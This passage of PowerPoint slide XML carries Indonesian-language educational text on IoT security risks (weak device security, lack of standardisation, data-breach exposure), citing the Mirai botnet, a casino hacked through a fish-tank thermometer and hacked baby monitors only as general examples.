            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengorbankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengintegrasian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> botnet Mirai, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jutaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluncurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdistribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar-besaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DDoS) pada situs web dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> online. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termometer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ikan, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus-kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-matai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bayi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. "Kasino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Diretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Termometer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
